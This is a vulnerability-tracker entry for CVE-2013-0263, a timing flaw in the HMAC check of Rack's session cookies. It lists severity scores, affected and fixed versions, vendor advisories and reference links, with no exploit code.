CVE-2013-0263
medium
CVSS v3
—
CVSS v2
5.1
VIR risk
5.1
Description
Rack::Session::Cookie in Rack 1.5.x before 1.5.2, 1.4.x before 1.4.5, 1.3.x before 1.3.10, 1.2.x before 1.2.8, and 1.1.x before 1.1.6 allows remote attackers to guess the session cookie, gain privileges, and execute arbitrary code via a timing attack involving an HMAC comparison function that does not run in constant time.
Predictions
Exploit likelihood
20%
Patch ETA
—
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
Vendor advisory: debian — https://security-tracker.debian.org/tracker/CVE-2013-0263
Vendor advisory: secalert@redhat.com — http://secunia.com/advisories/52134
Vendor advisory: secalert@redhat.com — http://secunia.com/advisories/52033
Vendor advisory: secalert@redhat.com — http://rack.github.com/
OS impact
| OS | Version | Status | Fixed in |
|---|---|---|---|
| debian | bookworm | fixed | 1.4.1-2.1 |
| debian | bullseye | fixed | 1.4.1-2.1 |
| debian | forky | fixed | 1.4.1-2.1 |
| debian | sid | fixed | 1.4.1-2.1 |
| debian | trixie | fixed | 1.4.1-2.1 |
Application impact
| Vendor | Product | Versions | Fixed |
|---|---|---|---|
| rack_project | rack | 1.5.0 | |
| rack_project | rack | 1.5.1 | |
| rack_project | rack | 1.4.0 | |
| rack_project | rack | 1.4.1 | |
| rack_project | rack | 1.4.2 | |
| rack_project | rack | 1.4.3 | |
| rack_project | rack | 1.4.4 | |
| rack_project | rack | 1.3.0 | |
| rack_project | rack | 1.3.1 | |
| rack_project | rack | 1.3.2 | |
| rack_project | rack | 1.3.3 | |
| rack_project | rack | 1.3.4 | |
| rack_project | rack | 1.3.5 | |
| rack_project | rack | 1.3.6 | |
| rack_project | rack | 1.3.7 | |
| rack_project | rack | 1.3.8 | |
| rack_project | rack | 1.3.9 | |
| rack_project | rack | 1.2.0 | |
| rack_project | rack | 1.2.1 | |
| rack_project | rack | 1.2.2 | |
| rack_project | rack | 1.2.3 | |
| rack_project | rack | 1.2.4 | |
| rack_project | rack | 1.2.6 | |
| rack_project | rack | 1.2.7 | |
| rack_project | rack | 1.1.0 | |
| rack_project | rack | 1.1.4 | |
| rack_project | rack | 1.1.5 | |
| rack_project | rack | 1.1.6 | |
References
- https://nvd.nist.gov/vuln/detail/CVE-2013-0263
- http://lists.opensuse.org/opensuse-updates/2013-03/msg00048.html
- http://rack.github.com/
- http://rhn.redhat.com/errata/RHSA-2013-0686.html
- http://secunia.com/advisories/52033
- http://secunia.com/advisories/52134
- http://secunia.com/advisories/52774
- http://www.debian.org/security/2013/dsa-2783
- http://www.osvdb.org/89939
- https://bugzilla.redhat.com/show_bug.cgi?id=909071
- https://gist.github.com/codahale/f9f3781f7b54985bee94
- https://github.com/rack/rack/commit/0cd7e9aa397f8ebb3b8481d67dbac8b4863a7f07
- https://github.com/rack/rack/commit/9a81b961457805f6d1a5c275d053068440421e11
- https://groups.google.com/d/msg/rack-devel/xKrHVWeNvDM/4ZGA576CnK4J
- https://groups.google.com/forum/#%21msg/rack-devel/RnQxm6i13C4/xfakH81yWvgJ
- https://groups.google.com/forum/#%21msg/rack-devel/bf937jPZxJM/1s6x95vIhmAJ
- https://groups.google.com/forum/#%21msg/rack-devel/hz-liLb9fKE/8jvVWU6xYiYJ
- https://groups.google.com/forum/#%21msg/rack-devel/mZsuRonD7G8/DpZIOmMLbOgJ
- https://puppet.com/security/cve/cve-2013-0263
- https://twitter.com/coda/statuses/299732877745197056
- https://github.com/rack/rack
- https://groups.google.com/forum/#!msg/rack-devel/RnQxm6i13C4/xfakH81yWvgJ
- https://groups.google.com/forum/#!msg/rack-devel/bf937jPZxJM/1s6x95vIhmAJ
- https://groups.google.com/forum/#!msg/rack-devel/hz-liLb9fKE/8jvVWU6xYiYJ
- https://groups.google.com/forum/#!msg/rack-devel/mZsuRonD7G8/DpZIOmMLbOgJ
Verify integrity in audit chain (admin only). AS-IS.